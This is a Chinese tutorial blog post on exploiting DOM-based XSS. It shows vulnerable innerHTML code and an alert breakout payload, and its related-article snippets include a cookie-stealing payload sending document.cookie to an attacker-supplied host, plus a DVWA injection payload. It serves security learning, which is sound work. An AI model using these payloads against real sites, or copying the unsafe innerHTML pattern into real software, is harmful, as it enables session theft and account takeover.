DOM型的xss漏洞利用

最新推荐文章于 2024-08-17 16:48:35 发布
最新推荐文章于 2024-08-17 16:48:35 发布
阅读量1.6w 收藏 22
点赞数 2
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43814486/article/details/89444471
版权

DOM:通过JavaScript,可以重构整个HTML文档,就是说可以添加,移除等等,对页面的某个东西进行操作时,JavaScript就需要获得对HTML文档中所有元素进行访问的入口。这个入口就是DOM,所以在DOM型的xss漏洞利用中,DOM可以看成是一个访问HTML的标准程序接口。

特征:整个过程都是在前端完成的,没有后端的参与(纯前端的操作!)

原理:
这是页面代码
上图var str = document.getElementById(“text”).value;和 <input id=“text” name=“text” type=“text” value="" / > 意思是把我们输入的东西(字符串)赋值给str,然后document.getElementById(“dom”).innerHTML = “< a href=’”+str+"’>what do you see?< /a > "; 把这个字符串整合到a这个标签中的href(属性)里再把a标签写到dom这个标签中。最后< div id=“dom” >< /div > 执行这个dom标签

实例:
在这里插入图片描述
上图可以看到我们输入的东西会被拼接到a这个标签的href属性中:

< a href='"+str+"'>what do you see?</a>

所以我们可以构造对应的payload让它执行我们想让它做的事,比如输入:

' "alert('hello world!')">

于是在前端就变成了这个:

<a href='' "alert('hello world!')">'>what do you see?</a>

执行效果如下:
在这里插入图片描述

DOM型xss-x:
页面源代码:

<script>
              function domxss(){
                  var str = window.location.search;
                  var txss = decodeURIComponent(str.split("text=")[1]);
                  var xss = txss.replace(/\+/g,' ');
                  document.getElementById("dom").innerHTML = "<a href='"+xss+"'>就让往事都随风,都随风吧</a>";
                }
 </script>

从上面可以看出,它同样也是输入到a标签的href属性中,但是,它的输入是从页面的URL中获取的,所以它的危害是比较大的,原理和反射型的xss一样,我们可以发送这个含有我们构造的payload的URL给想要攻击的用户,就可以进行相应的行动。

老-男孩
关注
专栏目录
Web安全基础学习:XSS跨站脚本漏洞之DOMXSS
qq_51862722的博客
06-19 1566
DOMXSS漏洞:非持久XSS,且不与后台服务器产生数据交互,而是通过JS修改网页的DOM来执行恶意脚本进行攻击。注意,DOMXSS与反射和存储最大的区别在于,DOMXSS不经过服务端,全部的攻击过程都在客户端完成。
3-4DomXSS详解以及演示
山兔的博客
04-21 3549
学习DOMXSS前,先搞清楚什么是DOM 通过 JavaScript,可以重构整个 HTML 文档。您可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript 就需要获得对HTML 文档中所有元素进行访问的入口。这个入口,连同对 HTML 元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模来获得的(DOM)。 所以,你可以把DOM理解为一个可以访问HTML的标准编程接口。 举个栗子来理解一下DOM <html><head> <sc
web常见漏洞——XSS
最新发布
m0_64365018的博客
08-17 1272
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等,xss又分为了三种类分别为存储反射DOM
XSS漏洞检测和利用
2401_84434570的博客
04-22 977
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞。
信息安全技术(二)——利用DOM XSS
Wine_in_glass的博客
06-27 429
这一实验主要根据实验指导书完成了对于XSS的基本操作,其中反射XSS最为简单。而存储XSS和基于DOMXSS的效果更好,危害也更大。反射XSS,相对来说,危害较低,需要用户点击特定的链接才能触发。存储XSS,会把攻击代码保存到数据库,所以也叫持久XSS,因为它存在的时间是比较长的。DOM XSS,这类XSS主要通过修改页面的DOM节点形成XSS,称为DOM Based XSS不需要服务器。
利用DOM XSS
qq_71164192的博客
06-22 404
DOM XSS是一种跨站脚本攻击,利用浏览器的DOM解析HTML文档时的漏洞,注入恶意JavaScript代码,从而达到窃取用户敏感信息、盗取用户账号等目的。本文将介绍DOM XSS攻击的原理和危害,并介绍一些防范措施。
XSS跨站脚本漏洞
woo233的博客
07-28 857
Thu和max-age都为cookie的生命周期,max-age优先级高domain=.baidu.com表示在百度所有子网都可以用。在网页中按“ctrl+shift+delete”键,会出现下图所示,可清除之前上网的痕迹,恶意攻击者用web页面的漏洞,插入一些恶意代码,当用户访问页面的时候,代码就会执行,达到攻击目的.cookie和Session的对比所有的cookie值都保存在客户端。临时cookie存储在浏览器中,关闭浏览器,临时cookie即结束。......
DOM XSS 攻击演示(附链接)
Flag少侠的博客
01-25 3240
DOM XSS 攻击演示(附链接)
web渗透—xss之基于DOM漏洞
dongxie_tk的博客
11-14 4696
这个漏洞往往存在于客户端脚本,如果一个Javascript脚本访问需要参数的URL,且需要将该信息用于写入自己的页面,且信息未被编码,那么就有可能存在这个漏洞。
xss漏洞利用
icecream_sheep的博客
11-15 1653
首先,我们先在文件夹找到www命名的文件夹里的html文件夹,在里面创建一个hack.php文件,输入这段代码, 然后,再创建一个submit.php文件 然后,打开一个浏览器访问 192.168.xx.xxx(你的虚拟机的IP)/submit.php,然后进入到这个界面 在这个界面输入"/><script>window.open("http://(填入你的IP)/hack.php?cookie="+document.cookie);</script&...
跨站脚本漏洞(XSS)示例
04-15
NULL 博文链接:https://songjianyong.iteye.com/blog/1754973
XSS跨站脚本攻击漏洞修复方法
06-18
NULL 博文链接:https://gqsunrise.iteye.com/blog/2214704
XSS漏洞DOM总结、XSS利用(细)、XSS绕过
墨痕诉清风的博客
09-18 492
DOM,全称 Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM XSS 其实是一种特殊类的反射 XSS,它是基于 DOM 文档对象模的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的 Document object 文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。
反射/存储/DOMXSS攻击原理及攻击流程详解
G3et的博客
01-02 1989
XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,其允许攻击者在恶意用户的浏览器中执行脚本。这可能导致数据泄露、控制用户浏览器或执行其他恶意操作。 XSS 攻击通常利用网页的客户端代码(通常是 HTML 或 JavaScript)来执行。攻击者可能会向网页中插入恶意的 HTML 元素或 JavaScript 代码,试图欺骗浏览器执行攻击者的脚本。
XSS(DOM)利用与实战
qidiandexiaowu
09-10 1534
继续,Go,GO,Go !!! 目录等级为:low等级为:medium 等级为:low DVWA/vulnerabilities/xss_d/?default=English default没有经过严格的过滤。 构造payload:DVWA/vulnerabilities/xss_d/?default=English<script>alert(/XSS/)</script> 成功! 查看源码: <?php # No protections, anything goes
关于 XSS(跨站脚本漏洞)
辉小鱼的博客
09-05 1480
XSS攻击全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。
跨站脚本(XSS)漏洞
梁辰兴的博客
06-07 4953
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类: 1.反射性XSS; 2.存储XSS; 3.DOMXSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。形
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
wudideaqing的博客
06-24 2069
XSS(跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值